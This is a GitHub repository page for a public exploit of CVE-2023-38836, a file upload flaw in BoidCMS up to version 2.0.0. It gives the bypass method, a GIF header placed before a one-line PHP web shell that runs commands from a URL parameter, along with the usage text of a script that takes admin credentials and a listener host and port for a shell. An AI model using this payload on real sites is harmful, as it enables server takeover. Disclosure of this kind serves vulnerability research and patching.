Skip to content

Exploit for file upload vulnerability in BoidCMS version <=2.0.0

License

Notifications You must be signed in to change notification settings

1337kid/CVE-2023-38836

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

11 Commits
 
 
 
 
 
 
 
 

Repository files navigation

CVE-2023-38836 Exploit

File Upload vulnerability in BoidCMS v.2.0.0 allows an authenticated attacker to upload a file with dangerous type (CWE-434).
To exploit, an attacker could add a GIF header to bypass MIME type checks.

GIF89a;
<?php system($_GET["cmd"]); ?>

Usage

usage: CVE-2023-38836.py [-h] [-u URL] [-U USER] [-P PASSWD] [-l LHOST] [-p LPORT]

Exploit for CVE-2023-38836

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     website url
  -U USER, --user USER  admin username
  -P PASSWD, --passwd PASSWD
                        admin password
  -l LHOST, --lhost LHOST
                        listening host
  -p LPORT, --lport LPORT
                        listening port

About

Exploit for file upload vulnerability in BoidCMS version <=2.0.0

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages